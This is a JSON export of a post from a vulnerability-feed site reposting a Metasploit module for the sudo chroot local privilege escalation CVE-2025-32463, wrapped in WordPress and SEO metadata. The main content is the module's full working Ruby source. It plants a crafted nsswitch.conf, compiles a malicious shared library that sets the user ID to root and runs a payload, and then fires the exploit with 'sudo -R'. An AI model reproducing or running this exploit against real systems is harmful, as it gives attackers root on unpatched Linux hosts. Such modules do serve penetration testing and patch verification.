{"id":15866,"date":"2025-09-04T14:42:51","date_gmt":"2025-09-04T14:42:51","guid":{"rendered":"http:\/\/localhost\/?p=15866"},"modified":"2025-09-04T14:42:51","modified_gmt":"2025-09-04T14:42:51","slug":"sudo-chroot-1917-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=15866","title":{"rendered":"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-09-04T19:31:28&#8243;,&#8221;description&#8221;:&#8221;Sudo before version 1.19.17p1 allows user to use chroot option, when           executing command. The option is intended to run a command with        &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-04T18:56:21&#8243;,&#8221;modified&#8221;:&#8221;2025-09-04T18:56:21&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Sudo Chroot 1.9.17 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-32462&#8243;,&#8221;CVE-2025-32463&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n  Rank = NormalRanking\\n\\n  include Msf::Post::Linux::Priv\\n  include Msf::Post::Linux::System\\n  include Msf::Post::Linux::Compile\\n  include Msf::Post::Linux::Packages\\n  include Msf::Exploit::EXE\\n  include Msf::Exploit::FileDropper\\n\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Sudo Chroot 1.9.17 Privilege Escalation&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          Sudo before version 1.19.17p1 allows user to use `chroot` option, when\\n          executing command. The option is intended to run a command with\\n          user-selected root directory (if sudoers file allow it). Change in version\\n          1.9.14 allows resolving paths via `chroot` using user-specified root\\n          directory when sudoers is still evaluating.\\n          This allows the attacker to trick Sudo into loading arbitrary shared object,\\n          thus resulting in a privilege escalation.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;msutovsky-r7&#8217;, # module dev\\n          &#8216;Stratascale&#8217;, # poc dev\\n          &#8216;Rich Mirch&#8217; # security research\\n        ],\\n        &#8216;Platform&#8217; =\\u003e [ &#8216;linux&#8217; ],\\n\\n        &#8216;Arch&#8217; =\\u003e [ ARCH_CMD ],\\n\\n        &#8216;SessionTypes&#8217; =\\u003e [ &#8216;shell&#8217;, &#8216;meterpreter&#8217; ],\\n\\n        &#8216;Targets&#8217; =\\u003e [[ &#8216;Auto&#8217;, {} ]],\\n\\n        &#8216;Privileged&#8217; =\\u003e true,\\n\\n        &#8216;References&#8217; =\\u003e [\\n          [ &#8216;EDB&#8217;, &#8216;52352&#8217; ],\\n          [ &#8216;URL&#8217;, &#8216;https:\/\/www.helpnetsecurity.com\/2025\/07\/01\/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463\/&#8217;],\\n          [ &#8216;CVE&#8217;, &#8216;2025-32463&#8217;]\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-06-30&#8217;,\\n\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n        }\\n      )\\n    )\\n\\n    # force exploit is used to bypass the check command results\\n    register_advanced_options [\\n      OptString.new(&#8216;WritableDir&#8217;, [ true, &#8216;A directory where we can write files&#8217;, &#8216;\/tmp&#8217; ]),\\n    ]\\n  end\\n\\n  # borrowed from exploits\/linux\/local\/sudo_baron_samedit.rb\\n  def get_version\\n    versions = {}\\n    output = cmd_exec(&#8216;sudo &#8211;version&#8217;)\\n    if output\\n      version = output.split(\\&#8221;\\\\n\\&#8221;).first.split(&#8216; &#8216;).last\\n      versions[:sudo] = version if version =~ \/^\\\\d\/\\n    end\\n    versions[:sudo].gsub(\/p\/, &#8216;.&#8217;)\\n  end\\n\\n  def check\\n    sudo_version = installed_package_version(&#8216;sudo&#8217;) || get_version\\n\\n    return CheckCode::Unknown(&#8216;Could not identify the version of sudo.&#8217;) if sudo_version.blank?\\n\\n    return CheckCode::Safe if !file?(&#8216;\/etc\/nsswitch.conf&#8217;)\\n\\n    return CheckCode::Appears(\\&#8221;Running version #{sudo_version}\\&#8221;) if Rex::Version.new(sudo_version).between?(Rex::Version.new(&#8216;1.9.14&#8217;), Rex::Version.new(&#8216;1.9.17&#8217;))\\n\\n    CheckCode::Safe(\\&#8221;Sudo #{sudo_version} is not vulnerable\\&#8221;)\\n  end\\n\\n  def exploit\\n    # Check if we&#8217;re already root\\n    if !datastore[&#8216;ForceExploit&#8217;] \\u0026\\u0026 is_root?\\n      fail_with Failure::None, &#8216;Session already has root privileges. Set ForceExploit to override&#8217;\\n    end\\n\\n    # needs to compile in real-time to adjust payload execution path\\n    fail_with Failure::NotFound, &#8216;Module needs to compile payload on target machine&#8217; unless live_compile?\\n\\n    payload_file = rand_text_alphanumeric(5..10)\\n\\n    existing_shell = cmd_exec(&#8216;echo $0 || echo ${SHELL}&#8217;)\\n\\n    return Failure::NotFound, &#8216;Could not find shell&#8217; unless file?(existing_shell)\\n\\n    upload_and_chmodx(\\&#8221;#{datastore[&#8216;WritableDir&#8217;]}\/#{payload_file}\\&#8221;, \\&#8221;#!#{existing_shell}\\\\n#{payload.encoded}\\&#8221;)\\n\\n    register_files_for_cleanup(\\&#8221;#{datastore[&#8216;WritableDir&#8217;]}\/#{payload_file}\\&#8221;)\\n\\n    temp_dir = \\&#8221;#{datastore[&#8216;WritableDir&#8217;]}\/#{rand_text_alphanumeric(5..10)}\\&#8221;\\n\\n    base_dir = rand_text_alphanumeric(5..10)\\n\\n    lib_filename = rand_text_alphanumeric(5..10)\\n\\n    mkdir(temp_dir)\\n\\n    cd(temp_dir)\\n\\n    mkdir(base_dir.to_s)\\n\\n    mkdir(\\&#8221;#{base_dir}\/etc\\&#8221;)\\n\\n    mkdir(&#8216;libnss_&#8217;)\\n\\n    return Failure::PayloadFailed, &#8216;Failed to create malicious nsswitch.conf file&#8217; unless write_file(\\&#8221;#{base_dir}\/etc\/nsswitch.conf\\&#8221;, \\&#8221;passwd: \/#{lib_filename}\\\\n\\&#8221;)\\n\\n    return Failure::PayloadFailed, &#8216;Failed to copy \/etc\/group&#8217; unless copy_file(&#8216;\/etc\/group&#8217;, \\&#8221;#{base_dir}\/etc\/group\\&#8221;)\\n\\n    exploit_code = %\\u003c\\n    #include \\u003cunistd.h\\u003e\\n\\n    __attribute__((constructor))\\n    void exploit(void) {\\n      setreuid(0,0);\\n      execve(\\&#8221;#{datastore[&#8216;WritableDir&#8217;]}\/#{payload_file}\\&#8221;,NULL,NULL);\\n\\n    }\\u003e\\n\\n    upload_and_compile(\\&#8221;#{temp_dir}\/libnss_\/#{lib_filename}.so.2\\&#8221;, exploit_code, \\&#8221;-shared -fPIC -Wl,-init,#{base_dir}\\&#8221;)\\n\\n    cmd_exec(\\&#8221;sudo -R #{base_dir} #{base_dir}\\&#8221;)\\n\\n    timeout = 30\\n    print_status &#8216;Launching exploit&#8230;&#8217;\\n    output = cmd_exec &#8216;command&#8217;, nil, timeout\\n    output.each_line { |line| vprint_status line.chomp }\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/local\/sudo_chroot_cve_2025_32463.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.3,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/local\/sudo_chroot_cve_2025_32463\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-09-04T19:31:28&#8243;,&#8221;description&#8221;:&#8221;Sudo before version 1.19.17p1 allows user to use chroot option, when executing command. The option is intended to run a command with &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-04T18:56:21&#8243;,&#8221;modified&#8221;:&#8221;2025-09-04T18:56:21&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Sudo Chroot 1.9.17&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,169,13,7,11,5],"class_list":["post-15866","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=15866\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-09-04T19:31:28&#8243;,&#8221;description&#8221;:&#8221;Sudo before version 1.19.17p1 allows user to use chroot option, when executing command. The option is intended to run a command with &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-04T18:56:21&#8243;,&#8221;modified&#8221;:&#8221;2025-09-04T18:56:21&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Sudo Chroot 1.9.17...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=15866\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-04T14:42:51+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15866#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15866\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463-\",\"datePublished\":\"2025-09-04T14:42:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15866\"},\"wordCount\":911,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15866#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15866\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15866\",\"name\":\"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-09-04T14:42:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15866#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15866\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15866#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=15866","og_locale":"en_US","og_type":"article","og_title":"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-09-04T19:31:28&#8243;,&#8221;description&#8221;:&#8221;Sudo before version 1.19.17p1 allows user to use chroot option, when executing command. The option is intended to run a command with &#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-04T18:56:21&#8243;,&#8221;modified&#8221;:&#8221;2025-09-04T18:56:21&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Sudo Chroot 1.9.17...","og_url":"https:\/\/zero.redgem.net\/?p=15866","og_site_name":"zero redgem","article_published_time":"2025-09-04T14:42:51+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=15866#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=15866"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463-","datePublished":"2025-09-04T14:42:51+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=15866"},"wordCount":911,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=15866#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=15866","url":"https:\/\/zero.redgem.net\/?p=15866","name":"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-09-04T14:42:51+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=15866#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=15866"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=15866#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Sudo Chroot 1.9.17 Privilege Escalation_MSF:EXPLOIT-LINUX-LOCAL-SUDO_CHROOT_CVE_2025_32463-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15866","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15866"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15866\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15866"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15866"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15866"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}